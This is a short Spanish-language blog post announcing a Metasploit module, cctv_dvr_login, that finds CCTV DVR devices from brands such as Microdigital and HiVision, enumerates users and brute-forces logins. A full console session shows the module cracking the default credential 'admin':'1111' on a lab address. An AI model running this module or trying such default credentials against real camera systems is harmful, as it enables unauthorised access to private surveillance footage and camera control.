Hacking de sistemas CCTV con Metasploit

Un nuevo módulo para el Framework de Metasploit, cctv_dvr_login, descubre y pone a prueba la seguridad de los sistemas de vídeo vigilancia de los circuitos cerrados de televisión (CCTV). Estos sistemas suelen utilizarse en pequeñas tiendas, comunidades de vecinos, residencias personales y entornos empresariales como parte de su programa de seguridad física. Sin embargo, muchos de estos sistemas son vulnerables y pueden permitir a un atacante obtener acceso remoto. Este acceso remoto, activado por defecto, puede permitir no sólo la posibilidad de ver vídeo en tiempo real, si no también el control de las cámaras (si es compatible) y facilitar el acceso a imágenes de archivo.

La mayoría de los propietarios de los sistemas de vigilancia de vídeo de CCTV pueden incluso no ser conscientes de las capacidades de su dispositivo, algunos de los cuales pueden estar expuestos a Internet, ya sea intencionalmente o por accidente.

En este módulo se dirige a sistemas CCTV de Microdigital, HiVision, CTRing y un número importante de otros dispositivos provenientes de estas marcas. Es capaz de descubrir los equipos existentes en la red, determinar los usuarios válidos y excluir los que no lo son y realizar ataques de fuerza bruta para obtener un login válido:


msf > use auxiliary/scanner/misc/cctv_dvr_login
msf auxiliary(cctv_dvr_login) > set RHOSTS 10.10.1.14
RHOSTS => 10.10.1.14
msf auxiliary(cctv_dvr_login) > exploit

[*] 10.10.1.14:5920 CCTV_DVR - [001/133] - Trying username:’admin’ with password:”
[-] 10.10.1.14:5920 CCTV_DVR - [001/133] - Failed login as: ‘admin’
[*] 10.10.1.14:5920 CCTV_DVR - [002/133] - Trying username:’user’ with password:”
[-] 10.10.1.14:5920 CCTV_DVR - [002/133] - Invalid user: ‘user’
[*] 10.10.1.14:5920 CCTV_DVR - [003/133] - Trying username:’admin’ with password:’admin’
[-] 10.10.1.14:5920 CCTV_DVR - [003/133] - Failed login as: ‘admin’
[*] 10.10.1.14:5920 CCTV_DVR - [004/133] - Trying username:’admin’ with password:’1111’
[+] 10.10.1.14:5920 Successful login: ‘admin’ : ‘1111’
[*] Confirmed IE ActiveX HTTP interface (CtrWeb.cab v1,1,3,1): http://10.10.1.14:80
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed 

Más detalles técnicos en Gotham Digital Science Blog.


Comentarios

Publicar un comentario